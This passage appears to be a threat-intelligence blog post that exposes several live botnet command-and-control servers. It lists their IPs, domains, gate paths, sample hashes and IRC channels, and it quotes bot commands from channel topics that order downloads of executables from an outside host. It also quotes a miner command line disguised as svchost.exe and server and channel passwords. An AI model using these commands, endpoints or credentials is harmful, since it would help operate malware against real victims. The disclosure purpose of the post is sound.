Server: 46.182.107.35:4042
Channel: #pirelli
Now talking in #pirelli
Topic On: [ #pirelli ] [ !down /99/106/112/81/55/59/40/125/111/122/35/110/105/106/100/107/119/122/121/59/106/120/102/9/71/113/109/127/105/99/54/56/52/50/49/22/48/55/59/15/44/52/51/40/99/101/ 12]
Topic By: [ x ]
Credits to aLiSs for finding this botnet.
Hosting infos: http://whois.domaintools.com/46.182.107.35
synd1cat3.com (Athena http botnet hosted by hostlatte.com)
Resolved synd1cat3.com to 192.95.33.40
Server: synd1cat3.com
Gate file: /kJuN2p/gate.php
Hosting infos: http://whois.domaintools.com/192.95.33.40
Related md5s (search on malwr.com to download the samples):
Athena http: 88730b35c88269066e191695cf1e148d
178.79.183.247 (Lightaidra router botnet hosted by linode.com)
Server: 178.79.183.247, 50.2.193.199, 94.229.66.97
Port: 65112
Current global users: 2898, Max: 2988
Channel: ##hug##
Topic for ##hug## is: .advscan->random->b root dreambox
Topic for ##hug## set by gaspolo at Fri May 31 13:36:47 2013
Oper: [GaSp`ZzzZ] (~g45p0@5.144.173.5): g45p0
[GaSp`ZzzZ] irc.primo.org :Yet another IRC Server running on Debian GNU/Linux
[GaSp`ZzzZ] idle 181:02:12, signon: Thu May 30 22:19:39
[GaSp`ZzzZ] End of WHOIS
cthulhuhf.net (Betabot http botnet hosted by warez-host.com)
Resolved cthulhuhf.net to 91.223.82.43
Server: cthulhuhf.net
Gate file: /misc/order.php
Alternate domains: cthulhuhf.eu cthulhuhf.org.uk cthulhuhf.co.uk cthulhuhf.xxx
Hosting infos: http://whois.domaintools.com/91.223.82.43
Related md5s (search on malwr.com to download the samples):
Beta bot: aa07b845981ba53b6100dba745ba5c1a
www.mydowncenter.me (Andromeda http botnet hosted by pw-service.com)
Resolved www.mydowncenter.me to 37.0.122.132
Server: www.mydowncenter.me
Gate file: /andro/image.php
Plugins
Rootkit: hxxp://www.mydowncenter.me/andro/r.pack
Socks: hxxp://www.mydowncenter.me/andro/s.pack
Formgrabber: hxxp://www.mydowncenter.me/andro/f.pack
Gate file: /andro/fg.php
Hosting infos: http://whois.domaintools.com/37.0.122.132
Related md5s (search on malwr.com to download the samples):
Andromeda: a26ffa2c7bd0e7899b04768f9e76a938
150mb samples
This is another package with different malware samples. Have fun analysing them. You can have the samples here.
s5.6d6f6e65797072696e746572.com (Betabot http botnet hosted by infiumhost.com)
Resolved s5.6d6f6e65797072696e746572.com to 188.190.127.160
Server: s5.6d6f6e65797072696e746572.com
Gate file: /wp-admin/order.php
Alternate domains: ripraktec147.com youdbeproud228.com wyomiriding928.com
Mining info: svchost.exe’ -I 100 -T 200 -t 2 -o stratum+tcp://s2.6d6f6e65797072696e746572.com:3333 -u mp187.her -p lex
Hosting infos: http://whois.domaintools.com/188.190.127.160
Related md5s (search on malwr.com to download the samples):
Betabot: db9a816d58899f1ba92bc338e89f856a
blackhats.su (Betabot http botnet proxied by cloudflare)
Server: blackhats.su
Gate file: /bb/order.php
Alternate domains: aeonhf.net aeonhf.me
You may recognize one of the domains, as it has appeared on the blog before. They used cloudflare that time as well. Let's see if we can get cloudflare to block access to it again.
Related md5s (search on malwr.com to download the samples):
Beta bot:
breathespacesfacebook.org (Socks5Masterz botnet hosted by burst.net)
Resolved breathespacesfacebook.org to 46.37.162.26
Server: breathespacesfacebook.org
Gate file: /gate.php
Alternate domains: tweaksights.org gotoguydreamed.org percussiontasked.org tenmileage.org
Hosting infos: http://whois.domaintools.com/46.37.162.26
Related md5s (search on malwr.com to download the samples):
Proxy bot: 7dc68e49d035107d132e19adf9f23d3b
t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)
Resolved t.baerr01.com to 122.195.244.35, 60.172.229.40, 60.169.73.119, 121.14.212.125, 121.12.123.140, 124.232.150.181, 222.88.194.187
Server: t.baerr01.com
Port: 6512
Server password: smart
Channel: #dpi
:hub.us.com 332 n[US{XPu{pwvvvwa #dpi :!mdns hxxp://146.185.246.192/av.txt !dl hxxp://146.185.246.192/111.exe !dl hxxp://146.185.246.192/brentback.exe !dl hxxp://146.185.246.192/dqw7.exe
Channel: #tar
Channel password: smart
A modified ircd is used, making it difficult to connect using a regular irc client.
Related md5s (search on